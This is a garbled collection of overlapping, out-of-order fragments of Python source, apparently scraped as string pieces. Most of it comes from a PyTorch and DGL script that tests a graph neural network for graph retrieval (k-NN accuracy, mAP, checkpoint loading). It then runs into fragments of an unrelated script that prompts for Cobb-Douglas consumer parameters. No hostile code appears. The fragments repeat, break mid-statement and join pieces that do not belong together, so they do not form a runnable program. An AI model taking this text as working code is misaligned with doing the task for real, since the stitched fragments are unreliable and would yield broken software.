CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel", "test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap =", "prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd()", "= [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if cuda:", "data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d", "torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load", "classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('*", "# K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query))", "utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import", "seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed)", "> 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda:", "and Load if args.load is None: raise Exception('Cannot test without loading a model.')", "checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***')", "np import time import os # Own modules from options import Options from", "dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix =", "import print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch import", "Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda =", "CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map", "args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow)", "import time import os # Own modules from options import Options from Logger", "import os # Own modules from options import Options from Logger import LogMetric", "[] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda'))", "g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval')", "model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda)", "distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT", "-*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\"", "# Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda &", "mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': #", "distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0", "glob import numpy as np import time import os # Own modules from", "= time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = []", "target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g =", "0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist'])", "meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True", "Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set", "kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5))", "= np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata =", "batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet =", "g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata =", "args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch =", "# Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda", "enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target)", "'__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda", "\"\"\" Graph classification \"\"\" # Python modules import torch import glob import numpy", "__future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch", "with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target) in", "coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" #", "{acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc,", "epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__", "# -*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification", "import numpy as np import time import os # Own modules from options", "if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin,", "= np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind =", "= [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = []", "dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery =", "= \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc =", "load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden,", "in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size,", "else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size", "args.cuda) if __name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' +", "Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g:", "= LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to test", "best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader,", "train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create", "g_gallery = [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if", "(g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g", "{meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse", "b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion", "{'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare", "knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data from loss.contrastive", "classification \"\"\" # Python modules import torch import glob import numpy as np", "start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP", "0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load", "torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion =", "print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map']", "target_gallery = [] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std']", "in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g)", "Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss", "__email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc", "net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda()", "switch to test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start", "modules from options import Options from Logger import LogMetric from utils import load_checkpoint,", "nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu >", "= [] for i, (g, target) in enumerate(data_loader): # Prepare input data if", "checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model", "j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output", "start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load is not", "# Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g", "in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() #", "print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check", "for i, (g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda'))", "\"\"\" # Python modules import torch import glob import numpy as np import", "swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion =", "distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data", "args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size =", "g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery,", "import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data", "combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query", "= time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g,", "= 0 best_map = 0 early_stop_counter = 0 if args.load is not None:", "Load if args.load is None: raise Exception('Cannot test without loading a model.') main()", "Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion =", "mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i,", "= ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path,", "ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet,", "np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No", "criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset,", "import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import", "import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda,", "{meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def", "swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader,", "= load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at", "options args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random", "criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader,", "= kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query,", "args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test", "args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap,", "meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x", "ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery,", "__name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) #", "enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix,", "distance = nets # switch to test mode net.eval() distance.eval() end = time.time()", "__author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time", "if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d =", "0 best_map = 0 early_stop_counter = 0 if args.load is not None: print('Loading", "from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data", "= g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d)", "net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query =", "g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query", "target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc", "& Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed)", "validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance =", "args = Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed", "net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter =", "if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine", "mode net.eval() distance.eval() end = time.time() dist_matrix = [] start = time.time() with", "and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if", "acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin,", "import torch import glob import numpy as np import time import os #", "target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}'", "from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\"", "ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader,", "load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ =", "retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time", "g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader):", "combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval", "Own modules from options import Options from Logger import LogMetric from utils import", "= dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix,", "= {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): #", "os # Own modules from options import Options from Logger import LogMetric from", "net.eval() distance.eval() end = time.time() dist_matrix = [] start = time.time() with torch.no_grad():", "modules import torch import glob import numpy as np import time import os", "device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda()", "list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query =", "for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() #", "== target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) #", "g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for", "mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f}", "is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch']", "= load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers,", "g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i,", "models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl", "Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return", "= target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery,", "args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) #", "target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery =", "= g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata", "mean_average_precision from models import models, distance from data.load_data import load_data from loss.contrastive import", "if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch", "= np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test", "valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net", "= Options().parse() print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda", "if __name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args))", "x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss &", "# switch to test mode net.eval() distance.eval() end = time.time() dist_matrix = []", "torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None:", "test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options args =", "at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if", "g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery))", "from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import", "else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix", "net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery", "hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1:", "Graph classification \"\"\" # Python modules import torch import glob import numpy as", "torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target) in enumerate(gallery_loader):", "dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query", "target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix,", "target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('*", "def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap", "= distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if", "= \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time =", "target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in", "= 0 early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint", "0 early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint =", "torch.cat(gdata)} target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare input", "No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1])", ".5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main():", "print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA')", "= LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets #", "None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map =", "{epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ ==", "args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise Exception('Cannot", "i, (g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std']", "nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net,", "print_function, division \"\"\" Graph classification \"\"\" # Python modules import torch import glob", "end = time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery =", "= dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target)", "TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader,", "load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch", "= [] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] =", "batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc,", "== '__main__': # Parse options args = Options().parse() print('Parameters:\\t' + str(args)) # Check", "net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch}", "distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0", "g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery)", "= net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery))", "import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance", "= nets # switch to test mode net.eval() distance.eval() end = time.time() dist_matrix", "(g, target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] =", "g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix)", "args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if", "print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options", "load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from data.load_data import load_data from", "= models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda", "test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start = time.time()", "from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules import", "Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g =", "print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix =", "criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load is", "gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter()", "print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size,", "target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix" ]
[ "detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ')", "detemine the market prices of [x,y]: ') income=input('Please detemine the income of individual:", "determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper):", "') income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters of", "individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number", "detemine the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ')", "the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please", "Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for", "') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of", "prices of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please detemine", "the market prices of [x,y]: ') income=input('Please detemine the income of individual: ')", "of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please detemine the", "the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import", "income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine", "parameters of 